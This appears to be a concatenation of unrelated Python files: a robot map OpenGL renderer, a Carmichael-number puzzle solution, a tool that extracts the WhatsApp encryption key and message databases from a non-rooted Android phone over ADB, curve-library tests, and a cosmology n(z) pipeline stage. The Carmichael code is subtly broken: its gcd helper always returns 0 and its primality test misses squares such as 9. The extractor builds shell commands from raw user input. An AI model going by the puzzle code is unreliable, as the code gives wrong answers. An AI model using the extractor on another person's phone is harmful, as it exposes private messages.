:param center: the center point of the rendered circle
:param radius: the size of the rendered circle
:param sections: the number of vertices used in the dashed line circle
:param color: the color to render the points
"""
cls._set_color(color)
glBegin(GL_LINES)
for i in range(sections):
theta = pi * 2.0 * float(i) / float(sections - 1)
glVertex3f(center.x + cos(theta) * radius,
center.y + sin(theta) * radius,
center.z)
glEnd()
@classmethod
def _render_wall(cls, wall: Wall, height: float, color: List[float]):
"""Draws walls out of quads in the 3D Viewer. The walls are drawn a
constant height above their ground-plane points, as a convention.
This function must be invoked inside the OpenGL render loop.
:param wall_list: the walls to draw
:param radius: the size of the rendered circle
:param sections: the number of vertices used in the dashed line circle
:param color: the color to render the points
"""
cls._set_color(color)
glBegin(GL_QUADS)
for wall_segment in wall.segments:
glNormal3f(wall_segment.normal.x, wall_segment.normal.y, wall_segment.normal.z)
glVertex3f(wall_segment.a.x, wall_segment.a.y, wall_segment.a.z)
glVertex3f(wall_segment.b.x, wall_segment.b.y, wall_segment.b.z)
glVertex3f(wall_segment.b.x, wall_segment.b.y, wall_segment.b.z + height)
glVertex3f(wall_segment.a.x, wall_segment.a.y, wall_segment.a.z + height)
glEnd()
@property
def open_nodes(self) -> List[Vector3]:
""":return: Points on the map which have no proximity detections between
themselves and the proximity scan origin point that found them.
These are safe points for the robot to drive to.
"""
return self._open_nodes
@open_nodes.setter
def open_nodes(self, open_nodes: List[Vector3]):
self._open_nodes = open_nodes
@property
def contact_nodes(self) -> List[Vector3]:
""":return: Points where an obstacle has been detected, but are too far
from other contacts to construct a wall from.
"""
return self._contact_nodes
@property
def walls(self) -> List[Wall]:
""":return: Chains of points denoting barriers detected by the proximity
sensor.
"""
return self._walls
@property
def cleared_territories(self) -> List[ClearedTerritory]:
""":return: Regions of space the robot has finished scanning. Any points
inside one of these regions can be considered accurate in terms of
detected boundaries.
"""
return self._cleared_territories
@property
def collection_active(self) -> bool:
""":return: Whether or not proximity data should currently be collected."""
return self._collection_active
@collection_active.setter
def collection_active(self, collection_active: bool):
self._collection_active = collection_active
def render(self, user_data_queue: mp.Queue = None):
"""Low level OpenGL calls to render the current state in an opengl_viewer. This
code will be executed inside the viewer's process.
Can be added to a viewer with the following code, telling the viewer to call this
whenever it redraws its geometry.
.. code-block:: python
robot.viewer_3d.add_render_call(my_map_state.render)
:param user_data_queue: The queue to read MapState messages from the main process.
:type user_data_queue: mulitprocessing.Queue
"""
try:
latest: MapState = user_data_queue.get(False)
self._open_nodes = latest._open_nodes # pylint: disable=protected-access
self._contact_nodes = latest._contact_nodes # pylint: disable=protected-access
self._walls = latest._walls # pylint: disable=protected-access
self._cleared_territories = latest._cleared_territories # pylint: disable=protected-access
self._collection_active = latest._collection_active # pylint: disable=protected-access
except mp.queues.Empty:
pass
glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
glEnable(GL_BLEND)
glPolygonMode(GL_FRONT_AND_BACK, GL_FILL)
glDisable(GL_LIGHTING)
if RENDER_METADATA_OBJECTS:
self._render_points(self._contact_nodes, NODE_CONTACT_RENDER_SIZE, NODE_CONTACT_RENDER_COLOR)
self._render_points(self._open_nodes, NODE_OPEN_RENDER_SIZE, NODE_OPEN_RENDER_COLOR)
# render the nav point open sample
if self._cleared_territories and self._open_nodes:
self._render_circle(self._open_nodes[0], NAV_POINT_RENDER_SIZE, NAV_POINT_RENDER_SECTIONS, NAV_POINT_RENDER_COLOR)
for cleared_territory in self._cleared_territories:
self._render_circle(cleared_territory.center, cleared_territory.radius, TERRITORY_RENDER_SECTIONS, TERRITORY_RENDER_COLOR)
glEnable(GL_LIGHTING)
for wall in self._walls:
self._render_wall(wall, WALL_RENDER_HEIGHT_MM, WALL_RENDER_COLOR)
|
import sys
import math
# You might know Fermat’s small theorem:
# If n is prime, then for any integer a, we have a^n ≡ a mod n,
# that means that a^n and a have the same r in the euclidian division by n.
# There are numbers, called Carmichael numbers, that are not prime but for which the equality remains true for any integer a.
# For example, 561 is a Carmichael numbers because for any integer a, a^561 ≡ a mod 561. It’s in fact the smallest Carmichael number.
# You have to tell if the given number is a Carmichael number or not. Beware, you might be given a prime number.
# Input
# A single number n.
# Output
# YES if n is a Carmichael number, or NO if it’s not.
# Informations complémentaires trouvées trouvé sur Wikipedia (https://fr.wikipedia.org/wiki/Nombre_de_Carmichael)
# # Tout nombre de Carmichael est impair et ne peux pas être un nombre premier
# testing if a^n and a have the same remainder in the euclidian division by n
# this is (a**n) % n == (a % n)
# pour tout entier a premier avec n, n est un diviseur de a^(n-1) - 1
# a premier avec n, signifie que le pgcd de n et de a est 1
# Auto-generated code below aims at helping you parse
# the standard input according to the problem statement.
def is_prime(n):
for i in range(2,int(math.ceil(math.sqrt(n)))):
if n % i == 0:
return False
return True
def pgcd(a,b):
r = a % b
while r != 0 :
a = b
b = r
r = a % b
return r
def is_carmichael_number(n):
# Informations complémentaires trouvées trouvé sur Wikipedia (https://fr.wikipedia.org/wiki/Nombre_de_Carmichael)
# Tout nombre de Carmichael est impair et ne peux pas être un nombre premier
if is_prime(n) or n % 2 == 0:
return False
else:
# testing if a^n and a have the same remainder in the euclidian division by n
# this is (a**n) % n == (a % n)
# pour tout entier a premier avec n, n est un diviseur de a^(n-1) - 1
# a premier avec n, signifie que le pgcd de n et de a est 1
a = 2
n_minus_one = n-1
while a < n :
# Test n et a premier entre eux
# De plus est-ce que n est un diviseur de a^(n-1) - 1
# Si premier entre eux et n n'est pas un diviseur de a^(n-1) - 1, nous n'avons pas un nombre de Carmichael
if pgcd(n,a) == 1 and (a**(n_minus_one) - 1) % n != 0:
return False
a += 1
#If we arrive here, we have a Carmichael number
return True
if __name__ == "__main__":
n = int(input())
answer = "YES" if is_carmichael_number(n) else "NO"
# Write an action using print
# To debug: print("Debug messages...", file=sys.stderr)
print(answer)
|
import os
import platform
import re
import shutil
import subprocess
import helpers.ADBDeviceSerialId as deviceId
import protect
from helpers.CustomCI import CustomInput, CustomPrint
# Detect OS
isWindows = False
isLinux = False
if platform.system() == 'Windows':
isWindows = True
if platform.system() == 'Linux':
isLinux = True
# Global variables
isJAVAInstalled = False
# Global command line helpers
tmp = 'tmp/'
helpers = 'helpers/'
bin = 'bin/'
extracted = 'extracted/'
tar = 'tar.exe'
if(isWindows):
adb = 'bin\\adb.exe -s '
else:
adb = 'adb -s '
tar = 'tar'
def main():
os.system('cls' if os.name == 'nt' else 'clear')
ShowBanner()
global isJAVAInstalled
isJAVAInstalled = CheckJAVA()
ADBSerialId = deviceId.init()
if(ADBSerialId):
sdPath = subprocess.getoutput(
adb + ADBSerialId + ' shell "echo $EXTERNAL_STORAGE"') or '/sdcard'
else:
sdPath = ''
ExtractAB(isJAVAInstalled, sdPath=sdPath,
ADBSerialId=ADBSerialId, callingFromOtherModule=False)
def CheckJAVA():
JAVAVersion = re.search('(?<=version ")(.*)(?=")', str(subprocess.check_output(
'java -version'.split(), stderr=subprocess.STDOUT))).group(1)
isJAVAInstalled = True if(JAVAVersion) else False
if (isJAVAInstalled):
CustomPrint('Found Java installed on system. Continuing...')
return isJAVAInstalled
else:
noJAVAContinue = CustomInput(
'It looks like you don\'t have JAVA installed on your system. Would you like to (C)ontinue with the process and \'view extract\' later? or (S)top? : ', 'red') or 'c'
if(noJAVAContinue.upper() == 'C'):
CustomPrint(
'Continuing without JAVA, once JAVA is installed on system run \'view_extract.py\'', 'yellow')
return isJAVAInstalled
else:
Exit()
def CleanTmp():
if(os.path.isdir(tmp)):
CustomPrint('Cleaning up tmp folder...', 'yellow')
shutil.rmtree(tmp)
def Exit():
print('\n')
CustomPrint('Exiting...')
os.system(
'bin\\adb.exe kill-server') if(isWindows) else os.system('adb kill-server')
quit()
def ExtractAB(isJAVAInstalled, sdPath='', ADBSerialId='', callingFromOtherModule=True):
if not (isJAVAInstalled):
CustomPrint('Can not detect JAVA on system.')
# move whatsapp.ab from tmp to user specified folder.
userName = CustomInput('Enter a name for this user. : ')
os.mkdir(extracted) if not (os.path.isdir(extracted)) else CustomPrint(
'Folder ' + extracted + 'already exists.', 'yellow')
os.mkdir(extracted + userName) if not (os.path.isdir(extracted + userName)
) else CustomPrint('Folder ' + extracted + userName + ' exists.')
os.rename(tmp + 'whatsapp.ab', extracted + userName + '/whatsapp.ab')
CustomPrint('Moved whatsapp.ab to ' + extracted + userName + ' folder. Size : ' +
str(os.path.getsize(extracted + userName + '/whatsapp.ab')) + ' bytes.')
CustomPrint('Run view_extract.py after installing Java on system.')
CleanTmp()
Exit()
if(not callingFromOtherModule):
if(CustomInput('Have you already made whatsapp.ab and just extracting it now ? : ').upper() == 'Y'):
ListUserFolders()
print('\n')
userName = CustomInput(
'Enter a name of folder from above (case sensitive) : ') or 'user'
abPass = CustomInput(
'Enter same password which you entered on device when prompted earlier. : ')
if(os.path.isfile(extracted + userName + '/whatsapp.ab')):
try:
CustomPrint('Found whatsapp.ab in ' + extracted + userName + ' folder. Size : ' + str(
os.path.getsize(extracted + userName + '/whatsapp.ab')) + ' bytes.')
os.mkdir(tmp) if not (os.path.isdir(tmp)) else CustomPrint(
'Folder ' + tmp + ' already exists.', 'yellow')
os.system('java -jar ' + bin + 'abe.jar unpack ' + extracted +
userName + '/whatsapp.ab ' + tmp + 'whatsapp.tar ' + str(abPass))
CustomPrint('Successfully unpacked ' + extracted + userName + '/whatsapp.ab to ' +
tmp + 'whatsapp.tar. Size : ' + str(os.path.getsize(tmp + 'whatsapp.tar')) + ' bytes.')
TakingOutMainFiles(userName, sdPath, ADBSerialId)
except Exception as e:
CustomPrint(e, 'red')
else:
CustomPrint('Could not find whatsapp.ab in ' + extracted +
userName + ' folder, did you name your user properly?')
Exit()
if(os.path.isfile(tmp + 'whatsapp.ab')):
CustomPrint('Found whatsapp.ab in tmp folder. Continuing... Size : ' +
str(os.path.getsize(tmp + '/whatsapp.ab')) + ' bytes.')
userName = CustomInput(
'Enter a reference name for this user. : ') or 'user'
abPass = CustomInput(
'Enter same password which you entered on device when prompted earlier. : ')
try:
os.system('java -jar ' + bin + 'abe.jar unpack ' + tmp +
'whatsapp.ab ' + tmp + 'whatsapp.tar ' + str(abPass))
CustomPrint('Successfully unpacked ' + tmp + 'whatsapp.ab to ' + tmp +
'whatsapp.tar. Size : ' + str(os.path.getsize(tmp + 'whatsapp.tar')) + ' bytes.')
TakingOutMainFiles(userName, sdPath, ADBSerialId)
except Exception as e:
CustomPrint(e, 'red')
def ListUserFolders():
print('\n')
CustomPrint('Available user folders in extracted directory.')
print('\n')
allFolders = next(os.walk(extracted))[1]
if(len(allFolders) == 0):
CustomPrint('No folders found in ' + extracted + ' folder.', 'red')
Exit()
for folder in allFolders:
CustomPrint(folder)
def ShowBanner():
banner_path = 'non_essentials/banner.txt'
try:
banner = open(banner_path, 'r')
banner_content = banner.read()
CustomPrint(banner_content, 'green', ['bold'], False)
banner.close()
except Exception as e:
CustomPrint(e, 'red')
CustomPrint('============ WhatsApp Key / Database Extrator for non-rooted Android ===========\n',
'green', ['bold'], False)
def TakingOutMainFiles(userName, sdPath, ADBSerialId):
os.mkdir(extracted) if not (os.path.isdir(extracted)) else CustomPrint(
'Folder ' + extracted + ' already exists.', 'yellow')
os.mkdir(extracted + userName) if not (os.path.isdir(extracted + userName)
) else CustomPrint('Folder ' + extracted + userName + ' already exists.', 'yellow')
# If user folder already exists ask user to overwrite or skip.
CustomPrint('Taking out main files in ' + tmp + ' folder temporaily.')
try:
bin = 'bin\\' if(isWindows) else ''
os.system(bin + tar + ' xvf ' + tmp + 'whatsapp.tar -C ' +
tmp + ' apps/com.whatsapp/f/key')
os.replace('tmp/apps/com.whatsapp/f/key',
extracted + userName + '/key')
os.system(bin + tar + ' xvf ' + tmp + 'whatsapp.tar -C ' +
tmp + ' apps/com.whatsapp/db/msgstore.db')
os.replace('tmp/apps/com.whatsapp/db/msgstore.db',
extracted + userName + '/msgstore.db')
os.system(bin + tar + ' xvf ' + tmp + 'whatsapp.tar -C ' +
tmp + ' apps/com.whatsapp/db/wa.db')
os.replace('tmp/apps/com.whatsapp/db/wa.db',
extracted + userName + '/wa.db')
os.system(bin + tar + ' xvf ' + tmp + 'whatsapp.tar -C ' +
tmp + ' apps/com.whatsapp/db/axolotl.db')
os.replace('tmp/apps/com.whatsapp/db/axolotl.db',
extracted + userName + '/axolotl.db')
os.system(bin + tar + ' xvf ' + tmp + 'whatsapp.tar -C ' +
tmp + ' apps/com.whatsapp/db/chatsettings.db')
os.replace('tmp/apps/com.whatsapp/db/chatsettings.db',
extracted + userName + '/chatsettings.db')
CleanTmp()
CustomPrint(
'You should not leave these extracted database and other files hanging in folder, it is very insecure.')
createArchive = CustomInput(
'Would you like to create a password protected archive? (default y) : ') or 'y'
if(createArchive.upper() == 'Y'):
print('\n')
CustomPrint('Now an archive will be created in extracted folder and original files will be deleted. To later \'un-archive\' and access these files you need to run \'python protect.py\' from root directory of this project.', 'yellow')
protect.Compress(userName)
else:
print('\n')
CustomPrint('\aYour whatsapp database along with other files is in ' +
os.path.realpath(extracted + userName) + ' folder.', 'yellow')
print('\n')
CustomInput('Press any key to continue.')
# TODO issue #13 : Ask user to save to sdcard.
if(sdPath and ADBSerialId):
copyTosdCard = CustomInput(
'Copy msgstore.db file to phone? (y/n) default \'n\' : ') or 'n'
if(copyTosdCard.upper() == 'Y'):
os.system(adb + ADBSerialId + ' push ' + extracted +
userName + '/msgstore.db ' + sdPath + '/msgstore.db')
CustomPrint('Done copying msgstore.db to phone.')
try: # Open in explorer.
if(isWindows):
os.startfile(os.path.realpath(extracted + userName))
elif(isLinux):
os.system('xdg-open ' +
os.path.realpath(extracted + userName))
else:
os.system('open ' + os.path.realpath(extracted + userName))
except:
pass
except Exception as e:
CustomPrint(e, 'red')
CleanTmp()
if __name__ == "__main__":
main()
|
# -*- coding: utf-8 -*-
import pytest
import numpy as np
from skcurve import Curve, Point, Axis
@pytest.mark.parametrize('data, size, ndim, dtype', [
([], 0, 2, np.int32),
(np.array([]), 0, 2, np.int32),
(np.array([], ndmin=2), 0, 2, np.int32),
(([1, 2, 3, 4, 5], [1, 2, 3, 4, 5]), 5, 2, np.float64),
(([1, 2], [1, 2], [1, 2]), 2, 3, np.float32),
(([1], [1], [1], [1]), 1, 4, np.int32),
(Curve([[1, 2, 3], [4, 5, 6]]), 3, 2, np.int32),
(np.array([[1, 2], [4, 5], [7, 8]], dtype=np.float), 3, 2, np.float64)
])
def test_construct(data, size, ndim, dtype):
curve = Curve(data, dtype=dtype)
assert len(curve) == size
assert curve.size == size
assert curve.ndim == ndim
assert curve.dtype == dtype
@pytest.mark.parametrize('data, ndmin, size, ndim', [
([], None, 0, 2),
([], 3, 0, 3),
(np.array([]), 4, 0, 4),
(([1, 2, 3, 4], [1, 2, 3, 4]), 3, 4, 3),
(Curve([[1, 2, 3, 4], [1, 2, 3, 4]]), 3, 4, 3),
(([1, 2, 3, 4, 5], [1, 2, 3, 4, 5]), None, 5, 2),
])
def test_construct_ndmin(data, ndmin, size, ndim):
curve = Curve(data, ndmin=ndmin)
assert curve.size == size
assert curve.ndim == ndim
def test_from_points():
"""Tests creating the instance of 'Curve' class from points
"""
points = [
Point([1, 5, 9]),
Point([2, 6, 10]),
Point([3, 7, 11]),
Point([4, 8, 12]),
]
points_array = np.array(points)
curve = Curve(points_array, axis=0)
assert curve.size == 4
assert curve.ndim == 3
assert curve.data == pytest.approx(points_array)
@pytest.mark.parametrize('curve_data', [
[],
[[], [], []],
])
def test_bool(curve_data):
curve = Curve(curve_data)
assert not curve
@pytest.mark.parametrize('curve_data1, curve_data2', [
([(1, 2, 3, 4), (5, 6, 7, 8)], [(1, 2, 3, 4), (5, 6, 7, 8)]),
([], []),
([[], []], [[], []]),
])
def test_eq(curve_data1, curve_data2):
assert Curve(curve_data1) == Curve(curve_data2)
@pytest.mark.parametrize('curve_data', [
[[1, 2, 3], [5, 6, 7]],
[[2, 3, 4, 5], [6, 7, 8, 9]],
[],
[[], []],
])
def test_ne(curve_data):
curve1 = Curve([(1, 2, 3, 4), (5, 6, 7, 8)])
curve2 = Curve(curve_data)
assert curve1 != curve2
def test_reverse():
curve = Curve([(1, 2, 3, 4), (5, 6, 7, 8)])
assert curve.reverse() == Curve([(4, 3, 2, 1), (8, 7, 6, 5)])
def test_reverse_parametric():
t = np.linspace(0, np.pi, 10)
x = np.cos(t)
y = np.sin(t)
curve = Curve([x, y], tdata=t)
reversed_curve = curve.reverse()
assert reversed_curve == Curve([x[::-1], y[::-1]])
assert reversed_curve.t == pytest.approx(np.linspace(np.pi, 0, 10))
@pytest.mark.parametrize('point_data', [
[1, 5],
[2, 6],
[4, 8],
[3, 7],
])
def test_contains_point(point_data):
curve = Curve([(1, 2, 3, 4), (5, 6, 7, 8)])
assert Point(point_data) in curve
@pytest.mark.parametrize('curve_data', [
[[1, 2], [5, 6]],
[[2], [6]],
[[2, 3], [6, 7]],
[[1, 2, 3], [5, 6, 7]],
[[2, 3, 4], [6, 7, 8]],
[[3, 4], [7, 8]],
[[1, 2, 3, 4], [5, 6, 7, 8]],
])
def test_contains_curve(curve_data):
curve = Curve([(1, 2, 3, 4), (5, 6, 7, 8)])
assert Curve(curve_data) in curve
@pytest.mark.parametrize('data', [
10,
Point([10, 20]),
Curve([[10, 20], [30, 40]]),
])
def test_not_contains(data):
curve = Curve([(1, 2, 3, 4), (5, 6, 7, 8)])
assert data not in curve
@pytest.mark.parametrize('point_data, start, stop, expected_index', [
([1, 5], None, None, 0),
([3, 7], 1, None, 2),
([2, 6], None, None, 1),
([2, 6], 2, None, 4),
([4, 8], None, 4, 3),
])
def test_index(point_data, start, stop, expected_index):
curve = Curve([(1, 2, 3, 4, 2), (5, 6, 7, 8, 6)])
assert curve.index(Point(point_data), start, stop) == expected_index
@pytest.mark.parametrize('point_data, expected_count', [
([0, 0], 0),
([1, 5], 1),
([3, 7], 2),
([2, 6], 3),
([4, 8], 1),
])
def test_count(point_data, expected_count):
curve = Curve([(1, 2, 3, 4, 2, 3, 2), (5, 6, 7, 8, 6, 7, 6)])
assert curve.count(Point(point_data)) == expected_count
@pytest.mark.parametrize('index, expected_data', [
(0, [1, 5]),
(1, [2, 6]),
(-1, [4, 8]),
(-2, [3, 7]),
])
def test_getitem_point(index, expected_data):
curve = Curve([(1, 2, 3, 4), (5, 6, 7, 8)])
assert curve[index] == Point(expected_data)
@pytest.mark.parametrize('indexer, expected_data', [
(slice(None, 2), [(1, 2), (5, 6)]),
(slice(1, 3), [(2, 3), (6, 7)]),
(slice(-2, -1), [(3,), (7,)]),
(slice(-2, None), [(3, 4), (7, 8)]),
(slice(None), [(1, 2, 3, 4), (5, 6, 7, 8)]),
([0, 2, 3], [(1, 3, 4), (5, 7, 8)]),
(np.array([0, 2, 3]), [(1, 3, 4), (5, 7, 8)]),
([True] * 4, [(1, 2, 3, 4), (5, 6, 7, 8)]),
([False] * 4, []),
])
def test_getitem_curve(indexer, expected_data):
curve = Curve([(1, 2, 3, 4), (5, 6, 7, 8)])
assert curve[indexer] == Curve(expected_data)
def test_getitem_curve_parametric():
tdata = [0, 1, 2, 3]
curve = Curve([(1, 2, 3, 4), (5, 6, 7, 8)], tdata=tdata)
sub_curve = curve[::2]
assert sub_curve.t == pytest.approx(np.array(tdata[::2]))
@pytest.mark.parametrize('indexer', [
(1, None),
(2, slice(None)),
(),
(slice(None),),
(slice(None), None),
(slice(None), slice(None)),
None,
np.zeros((2, 3)),
])
def test_getitem_error(indexer):
curve = Curve([(1, 2, 3, 4), (5, 6, 7, 8)])
with pytest.raises((TypeError, IndexError)):
_ = curve[indexer]
def test_concatenate():
left_curve = Curve([(1, 2), (5, 6)])
right_curve = Curve([(3, 4), (7, 8)])
expected_curve = Curve([(1, 2, 3, 4), (5, 6, 7, 8)])
assert left_curve + right_curve == expected_curve
left_curve += right_curve
assert left_curve == Curve([(1, 2, 3, 4), (5, 6, 7, 8)])
def test_concatenate_parametric():
left_curve = Curve([(1, 2), (5, 6)], tdata=[0, 1])
right_curve = Curve([(3, 4), (7, 8)], tdata=[2, 3])
expected_curve = Curve([(1, 2, 3, 4), (5, 6, 7, 8)], tdata=[0, 1, 2, 3])
assert (left_curve + right_curve).t == pytest.approx(expected_curve.t)
def test_insert_point():
curve = Curve([(1, 2, 3, 4), (5, 6, 7, 8)])
point = Point([10, 20])
curve1 = curve.insert(1, point)
assert curve1 == Curve([(1, 10, 2, 3, 4), (5, 20, 6, 7, 8)])
def test_insert_curve():
curve = Curve([(1, 2, 3, 4), (5, 6, 7, 8)])
sub_curve = Curve([(10, 20), (30, 40)])
curve1 = curve.insert(-3, sub_curve)
assert curve1 == Curve([(1, 10, 20, 2, 3, 4), (5, 30, 40, 6, 7, 8)])
def test_append_point():
curve = Curve([(1, 2, 3, 4), (5, 6, 7, 8)])
point = Point([10, 20])
curve1 = curve.append(point)
assert curve1 == Curve([(1, 2, 3, 4, 10), (5, 6, 7, 8, 20)])
def test_append_curve():
curve = Curve([(1, 2, 3, 4), (5, 6, 7, 8)])
sub_curve = Curve([(10, 20), (30, 40)])
curve1 = curve.append(sub_curve)
assert curve1 == Curve([(1, 2, 3, 4, 10, 20), (5, 6, 7, 8, 30, 40)])
@pytest.mark.parametrize('index, expected_data', [
(0, [(2, 3, 4), (6, 7, 8)]),
(1, [(1, 3, 4), (5, 7, 8)]),
(-1, [(1, 2, 3), (5, 6, 7)]),
(-2, [(1, 2, 4), (5, 6, 8)]),
])
def test_delete_point(index, expected_data):
curve = Curve([(1, 2, 3, 4), (5, 6, 7, 8)])
assert curve.delete(index) == Curve(expected_data)
@pytest.mark.parametrize('index, expected_data', [
(slice(None, 2), [(3, 4), (7, 8)]),
(slice(-2, None), [(1, 2), (5, 6)]),
(slice(None, None, 2), [(2, 4), (6, 8)]),
])
def test_delete_curve(index, expected_data):
curve = Curve([(1, 2, 3, 4), (5, 6, 7, 8)])
assert curve.delete(index) == Curve(expected_data)
@pytest.mark.parametrize('axis, expected_data', [
(Axis.X, np.array([1, 2, 3, 4])),
(Axis.Y, np.array([5, 6, 7, 8])),
(Axis.Z, np.array([9, 10, 11, 12])),
(-1, np.array([9, 10, 11, 12])),
])
def test_get_values(axis, expected_data):
curve = Curve([(1, 2, 3, 4), (5, 6, 7, 8), (9, 10, 11, 12)])
assert curve.values(axis) == pytest.approx(expected_data)
def test_insert_dim():
curve = Curve([(1, 2, 3, 4), (9, 10, 11, 12)])
curve1 = curve.insertdim(1, [5, 6, 7, 8])
assert curve1 == Curve([(1, 2, 3, 4), (5, 6, 7, 8), (9, 10, 11, 12)])
def test_append_dim():
curve = Curve([(1, 2, 3, 4), (5, 6, 7, 8)])
curve1 = curve.appenddim([9, 10, 11, 12])
assert curve1 == Curve([(1, 2, 3, 4), (5, 6, 7, 8), (9, 10, 11, 12)])
@pytest.mark.parametrize('index, expected_data', [
(Axis.X, [(5, 6, 7, 8), (9, 10, 11, 12)]),
(Axis.Y, [(1, 2, 3, 4), (9, 10, 11, 12)]),
(Axis.Z, [(1, 2, 3, 4), (5, 6, 7, 8)]),
(-1, [(1, 2, 3, 4), (5, 6, 7, 8)]),
])
def test_delete_dim(index, expected_data):
curve = Curve([(1, 2, 3, 4), (5, 6, 7, 8), (9, 10, 11, 12)])
curve1 = curve.deletedim(index)
assert curve1 == Curve(expected_data)
def test_delete_dim_error():
curve = Curve([(1, 2, 3, 4), (5, 6, 7, 8)])
with pytest.raises(ValueError):
curve.deletedim(axis=Axis.Y)
@pytest.mark.parametrize('curve_data, expected_data', [
([(4, 2, 3, 1), (8, 6, 7, 5)], [(4, 2, 3, 1), (8, 6, 7, 5)]),
([(3, 2, 1, 4, 2), (7, 6, 5, 8, 6)], [(3, 2, 1, 4), (7, 6, 5, 8)]),
([(3, 1, 2, 1, 4, 2), (7, 5, 6, 5, 8, 6)], [(3, 1, 2, 4), (7, 5, 6, 8)]),
])
def test_unique(curve_data, expected_data):
assert Curve(curve_data).unique() == Curve(expected_data)
@pytest.mark.parametrize('curve_data, isa, expected_data', [
([(1, 2, np.nan, 3, 2, 4), (5, 6, 1, 7, np.inf, 8)],
lambda x: np.isnan(x) | np.isinf(x), [(1, 2, 3, 4), (5, 6, 7, 8)]),
([(1, 2, 3, 4), (5, 6, 7, 8)],
lambda x: x == [2, 6], [(1, 3, 4), (5, 7, 8)]),
([(1, 2, 3, 4), (5, 6, 7, 8)],
lambda x: [1, 2], [(1, 4), (5, 8)]),
])
def test_drop(curve_data, isa, expected_data):
assert Curve(curve_data).drop(isa) == Curve(expected_data)
def test_isplane():
t = np.linspace(0, np.pi*2, 100)
x = np.sin(t)
y = t
z = t
curve = Curve([x, y, z])
assert curve.isplane
def test_isnotplane():
t = np.linspace(0, np.pi * 2, 100)
x = np.sin(t)
y = np.cos(t)
z = x * y
curve = Curve([x, y, z])
assert not curve.isplane
|
import numpy as np
import twopoint
import fitsio as fio
import healpy as hp
from numpy.lib.recfunctions import append_fields, rename_fields
from .stage import PipelineStage, NOFZ_NAMES
import subprocess
import os
import warnings
class nofz(PipelineStage):
name = "nofz"
inputs = {}
outputs = {
"weight" : "weight.npy" ,
"nz_source" : "nz_source_zbin.npy" ,
"nz_lens" : "nz_lens_zbin.npy" ,
"nz_source_txt" : "source.nz" ,
"nz_lens_txt" : "lens.nz" ,
"gold_idx" : "gold_idx.npy" ,
"lens_idx" : "lens_idx.npy" ,
"ran_idx" : "ran_idx.npy" ,
"randoms" : "randoms_zbin.npy" ,
"cov_ini" : "cov.ini" ,
"2pt" : "2pt.fits" ,
"metadata" : "metadata.yaml"
}
def __init__(self, param_file):
"""
Produces n(z)s from input catalogs.
"""
super(nofz,self).__init__(param_file)
# Load data
self.load_data()
if 'pzbin_col' in self.gold.dtype.names:
print 'ignoring any specified bins, since a bin column has been supplied in gold file'
# Construct new weight and cache - move to catalog
if 'weight' in self.pz.dtype.names:
self.weight = np.sqrt(self.pz['weight'] * self.shape['weight'])
else:
self.weight = self.shape['weight']
filename = self.output_path("weight")
np.save(filename, np.vstack((self.gold['objid'], self.weight)).T)
# deal with photo-z weights for lenses later...
# Setup binning
if self.params['pdf_type']!='pdf':
self.z = (np.linspace(0.,4.,401)[1:]+np.linspace(0.,4.,401)[:-1])/2.+1e-4 # 1e-4 for buzzard redshift files
self.dz = self.z[1]-self.z[0]
self.binlow = self.z-self.dz/2.
self.binhigh = self.z+self.dz/2.
else:
self.binlow = np.array(self.params['pdf_z'][:-1])
self.binhigh = np.array(self.params['pdf_z'][1:])
self.z = (self.binlow+self.binhigh)/2.
self.dz = self.binlow[1]-self.binlow[0]
if hasattr(self.params['zbins'], "__len__"):
self.tomobins = len(self.params['zbins']) - 1
self.binedges = self.params['zbins']
else:
self.tomobins = self.params['zbins']
self.binedges = self.find_bin_edges(self.pz['pzbin'][self.mask], self.tomobins, w = self.shape['weight'][self.mask])
if self.params['lensfile'] != 'None':
if hasattr(self.params['lens_zbins'], "__len__"):
self.lens_tomobins = len(self.params['lens_zbins']) - 1
self.lens_binedges = self.params['lens_zbins']
else:
self.lens_tomobins = self.params['lens_zbins']
self.lens_binedges = self.find_bin_edges(self.lens_pz['pzbin'], self.lens_tomobins, w = self.lens['weight'])
return
def run(self):
# Calculate source n(z)s and write to file
if self.params['has_sheared']:
pzbin = [self.pz['pzbin'],self.pz_1p['pzbin'],self.pz_1m['pzbin'],self.pz_2p['pzbin'],self.pz_2m['pzbin']]
else:
pzbin = self.pz['pzbin']
if self.params['pdf_type']!='pdf':
zbin, self.nofz = self.build_nofz_bins(
self.tomobins,
self.binedges,
pzbin,
self.pz_nofz['pzstack'],
self.params['pdf_type'],
self.weight,
shape=True)
else:
pdfs = np.zeros((len(self.pz),len(self.z)))
for i in range(len(self.z)):
pdfs[:,i] = self.pz['pzstack'+str(i)]
zbin, self.nofz = self.build_nofz_bins(
self.tomobins,
self.binedges,
pzbin,
pdfs,
self.params['pdf_type'],
self.weight,
shape=True)
self.get_sigma_e(zbin,self.tomobins,self.shape)
self.get_neff(zbin,self.tomobins,self.shape)
if self.params['has_sheared']:
zbin,zbin_1p,zbin_1m,zbin_2p,zbin_2m=zbin
np.save(self.output_path("nz_source"), np.vstack((self.gold['objid'], zbin,zbin_1p,zbin_1m,zbin_2p,zbin_2m)).T)
else:
np.save(self.output_path("nz_source"), np.vstack((self.gold['objid'], zbin)).T)
# Calculate lens n(z)s and write to file
if self.params['lensfile'] != 'None':
lens_zbin, self.lens_nofz = self.build_nofz_bins(
self.lens_tomobins,
self.lens_binedges,
self.lens_pz['pzbin'],
self.lens_pz['pzstack'],
self.params['lens_pdf_type'],
self.lens['weight'])
np.save(self.output_path("nz_lens") , np.vstack((self.lens['objid'], lens_zbin)).T)
ran_binning = np.digitize(self.randoms['ranbincol'], self.lens_binedges, right=True) - 1
np.save(self.output_path("randoms"), ran_binning)
self.get_lens_neff(lens_zbin,self.lens_tomobins,self.lens)
def write(self):
"""
Write lens and source n(z)s to fits file for tomographic and non-tomographic cases.
"""
nz_source = twopoint.NumberDensity(
NOFZ_NAMES[0],
self.binlow,
self.z,
self.binhigh,
[self.nofz[i,:] for i in range(self.tomobins)])
nz_source.ngal = self.neff
nz_source.sigma_e = self.sigma_e
nz_source.area = self.area
kernels = [nz_source]
np.savetxt(self.output_path("nz_source_txt"), np.vstack((self.binlow, self.nofz)).T)
if self.params['lensfile'] != 'None':
nz_lens = twopoint.NumberDensity(
NOFZ_NAMES[1],
self.binlow,
self.z,
self.binhigh,
[self.lens_nofz[i,:] for i in range(self.lens_tomobins)])
nz_lens.ngal = self.lens_neff
nz_lens.area = self.area
kernels.append(nz_lens)
np.savetxt(self.output_path("nz_lens_txt"), np.vstack((self.binlow, self.lens_nofz)).T)
data = twopoint.TwoPointFile([], kernels, None, None)
